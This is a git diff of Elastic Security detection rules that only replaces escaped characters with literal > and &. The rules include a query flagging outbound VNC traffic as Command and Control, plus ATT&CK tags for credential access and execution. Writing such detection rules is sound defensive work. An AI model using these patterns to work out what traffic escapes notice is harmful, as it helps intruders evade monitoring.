- "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n",
+ "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n",
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
 ],
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_103.json b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_103.json
index 44f54602b9d..cadd6b82b61 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_103.json
@@ -15,7 +15,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "VNC (Virtual Network Computing) to the Internet",
- "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n",
+ "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n",
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
 ],
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_104.json b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_104.json
index 9015ed5b297..6bd27139d6e 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_104.json
@@ -17,7 +17,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "VNC (Virtual Network Computing) to the Internet",
- "query": "(event.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and\n network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n",
+ "query": "(event.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and\n network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n",
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
 ],
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_101.json b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_101.json
index e1e2d2d533b..a45c2aad833 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_101.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_102.json b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_102.json
index 230b188d559..b467f9f072b 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_102.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_103.json b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_103.json
index 7d6a5d412a7..deb73ce29ef 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f_103.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_104.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_104.json
index 425c352b9c5..257730f6baf 100644
--- a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_104.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_105.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_105.json
index 0ee26cc8fc0..beb375ea9e7 100644
--- a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_105.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_106.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_106.json
index 4674c2c2335..2f5a9cfd11e 100644
--- a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_106.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_107.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_107.json
index b5e03d91822..fb94de52a76 100644
--- a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_107.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_108.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_108.json
index 25625387d44..700bd5e981c 100644
--- a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_108.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_104.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_104.json
index 847d119d418..740b385c2fc 100644
--- a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_104.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_105.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_105.json
index c5170ada8d8..0b513fbd964 100644
--- a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_105.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_106.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_106.json
index bd01dce091d..1b9872e4bf9 100644
--- a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_106.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_107.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_107.json
index c6ab3fe1d7f..7ef88a41cf9 100644
--- a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_107.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_108.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_108.json
index db5480b11f0..70b6772deb8 100644
--- a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_108.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_1.json b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_1.json
index 5caca57d936..16bc77b8010 100644
--- a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_1.json
@@ -45,7 +45,7 @@
 ],
 "risk_score": 21,
 "rule_id": "3d3aa8f9-12af-441f-9344-9f31053e316d",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -79,7 +79,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_2.json b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_2.json
index d39a7eeea9a..0c058bfb7fb 100644
--- a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_2.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "3d3aa8f9-12af-441f-9344-9f31053e316d",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_3.json b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_3.json
index 86305978eab..819ea006476 100644
--- a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_3.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 21,
 "rule_id": "3d3aa8f9-12af-441f-9344-9f31053e316d",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -83,7 +83,7 @@
 ]
 },
 {
